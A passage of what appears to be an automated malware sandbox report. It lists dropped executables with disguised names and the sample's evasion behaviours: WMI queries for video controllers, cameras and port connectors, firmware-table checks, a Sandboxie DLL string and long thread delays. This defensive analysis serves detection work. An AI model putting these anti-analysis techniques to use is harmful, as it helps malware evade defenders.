                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\upx.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\ydztkyrb.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Temp\swtpd1aw.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries memory information (via WMI often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PortConnector
                        Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Query firmware table information (likely to detect VMs)
                        Source: C:\Users\user\Desktop\Winscreen.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: FirmwareTableInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSystem information queried: FirmwareTableInformation
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: taskmoder.exe, 0000001F.00000000.2318415133.000000000051A000.00000002.00000001.01000000.0000000F.sdmp, taskmoder.exe.0.drBinary or memory string: SBIEDLL.DLLISOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                        Source: C:\Users\user\Desktop\Winscreen.exeMemory allocated: 1E60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeMemory allocated: 1C8F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A630000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: B80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 1A8E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\upx.exeMemory allocated: B40000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\upx.exeMemory allocated: 2710000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\upx.exeMemory allocated: B40000 memory reserve | memory write watch
                        Source: C:\Windows\Temp\ydztkyrb.exeMemory allocated: 18D0000 memory reserve | memory write watch
                        Source: C:\Windows\Temp\ydztkyrb.exeMemory allocated: 30C0000 memory reserve | memory write watch
                        Source: C:\Windows\Temp\ydztkyrb.exeMemory allocated: 50C0000 memory reserve | memory write watch
                        Source: C:\Windows\Temp\swtpd1aw.exeMemory allocated: 15D0000 memory reserve | memory write watch
                        Source: C:\Windows\Temp\swtpd1aw.exeMemory allocated: 3070000 memory reserve | memory write watch
                        Source: C:\Windows\Temp\swtpd1aw.exeMemory allocated: 2F90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: BD0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 29C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 2860000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 4E00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 6E00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeMemory allocated: 15F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeMemory allocated: 30D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeMemory allocated: 2FE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeMemory allocated: 5560000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeMemory allocated: 7560000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 2C70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 2F00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 2E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 5340000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 7340000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeMemory allocated: 990000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeMemory allocated: 1A360000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeMemory allocated: F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeMemory allocated: 1A890000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeMemory allocated: C70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 11C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 2C20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 2B30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 5160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 7160000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 3030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 3200000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 3030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 5810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMemory allocated: 7810000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Winscreen.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeThread delayed: delay time: 922337203685477Jump to behavior
